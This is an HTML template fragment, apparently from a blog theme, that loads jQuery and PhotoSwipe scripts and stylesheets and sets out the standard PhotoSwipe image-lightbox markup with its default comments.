<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/diaspora.js"></script>
<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">
<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>




</html>
